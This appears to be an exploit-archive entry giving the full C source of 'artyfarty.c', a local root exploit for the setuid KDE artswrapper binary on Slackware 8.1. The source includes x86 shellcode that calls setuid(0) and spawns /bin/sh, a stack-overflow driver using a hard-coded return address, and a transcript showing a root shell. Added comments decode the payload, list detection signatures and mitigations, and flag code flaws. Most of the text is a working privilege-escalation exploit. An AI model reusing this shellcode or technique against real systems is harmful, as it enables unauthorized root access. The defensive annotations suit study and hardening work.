artyfarty.c is a local root exploit for /opt/kde/bin/artswrapper, tested against Slackware 8.1. Artswrapper is setuid on some distributions.
f9e583b433b0720faaf3c2b12a611faba7d90142b62ce3a2fceaf2691c89dc77
/*
* ==================================================
* artyfarty.c local /opt/kde/bin/artswrapper exploit
* By: Knight420
* 11/29/02
*
* Tested against: Slackware 8.1*suid by default
*
* Gr33tz to: sorbo, dvdman, qubit, borgon
*
* (C) COPYRIGHT Blue Ballz , 2002
* all rights reserved
* =================================================
*
* secure@xeon:~> ./artyfarty
* Artswrapper Local exploit by: Knight420
* Using offset 0xbfffff96
* >> running as realtime process now (priority 50)
* sh-2.05a# id
* uid=0(root) gid=100(users) groups=100(users)
*/
#include <stdio.h>
/*
 * Base for the hard-coded return address: main() uses STACK_START - 106,
 * which matches the "Using offset 0xbfffff96" line in the header transcript.
 * Presumably the top of the user stack on a 32-bit Linux 3G/1G layout
 * (confirm for the target kernel). A fixed value like this only works when
 * stack addresses are not randomized.
 */
#define STACK_START 0xC0000000
/*
 * Payload bytes for 32-bit x86 Linux. Each "\xcd\x80" is an int 0x80 system
 * call; the values loaded into AL before them are 0x1b, 0x17, 0x0b and 0x01,
 * which in the i386 syscall table are alarm, setuid, execve and exit. EBX is
 * zeroed before the first two, so they read as alarm(0) and setuid(0); the
 * trailing "/bin/sh" is the program passed to execve.
 *
 * The array contains no NUL byte before its terminator, so main() can copy
 * it with a "%s" conversion.
 *
 * Detection note: the int 0x80 pairs next to a literal "/bin/sh" are a
 * common static signature for this class of payload.
 */
char shellcode[] =
"\x31\xdb\x31\xc0\xb0\x1b\xcd\x80"
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
"\xeb\x16\x31\xdb\x31\xc9\xf7\xe1"
"\x5b\xb0\x0b\x88\x53\x07\x52\x53"
"\x89\xe1\xcd\x80\xb0\x01\xcd\x80"
"\xe8\xe5\xff\xff\xff/bin/sh";
/*
 * Builds an oversized value for the "-m" option and a one-entry environment,
 * then executes /opt/kde/bin/artswrapper with them.
 *
 *   buff  - the int value ret repeated end to end, NUL-terminated at the
 *           last byte; passed as the argument following "-m".
 *   buff2 - "SHELL=" followed by the shellcode bytes; the only environment
 *           entry given to the target.
 *
 * NOTE(review): the vulnerable code in artswrapper is not shown on this
 * page. Presumably the "-m" value is copied into a fixed-size stack buffer
 * without a length check, and ret is meant to point into the SHELL= string
 * near the top of the new process's stack - confirm against the artswrapper
 * source.
 *
 * Defensive notes: the header states the binary is setuid by default on the
 * tested system, so removing the setuid bit from artswrapper (or installing
 * a fixed build) removes the privilege gain. The hard-coded address also
 * depends on a predictable, executable stack; stack address randomization
 * and a non-executable stack break that assumption. Observable artifacts of
 * a run are a roughly 1 KB "-m" argument made of one repeating 4-byte
 * pattern and an environment consisting solely of a SHELL= value with
 * non-printable bytes.
 */
int main(int argc, char *argv[]) {
char buff[1033];
char buff2[1033];
int *ptr;
/* 0xC0000000 - 106 = 0xbfffff96, the value shown in the header transcript. */
int ret= STACK_START - 106;
char *arg[] = { "artswrapper", "-m", buff, "-a foo", NULL } ;
char *env[] = { buff2, NULL };
/*
 * Fill buff with ret, one int at a time.
 * NOTE(review): 1033 is not a multiple of sizeof(int); with a 4-byte int the
 * final store starts at offset 1032 and writes 3 bytes past the end of buff,
 * which is undefined behaviour in this program itself. buff is also a char
 * array accessed through int *, with no alignment guarantee.
 */
for(ptr = (int*)&buff[0]; ptr < (int*)&buff[1033]; ptr++)
*ptr = ret;
/* Terminate the argument string; overwrites the low byte of the last store. */
buff[sizeof(buff)-1] = 0;
/* snprintf bounds the copy to buff2 and always NUL-terminates it. */
snprintf(buff2,sizeof(buff2),"SHELL=%s",shellcode);
printf("Artswrapper Local exploit by: Knight420\n");
/* NOTE(review): ret is an int but %p expects void * - format/type mismatch. */
printf("Using offset %p\n",ret);
/*
 * Only <stdio.h> is included in the visible file, so execve has no prototype
 * here. Its return value is not checked and main has no return statement, so
 * a failed exec ends the program silently.
 */
execve("/opt/kde/bin/artswrapper",arg,env);
}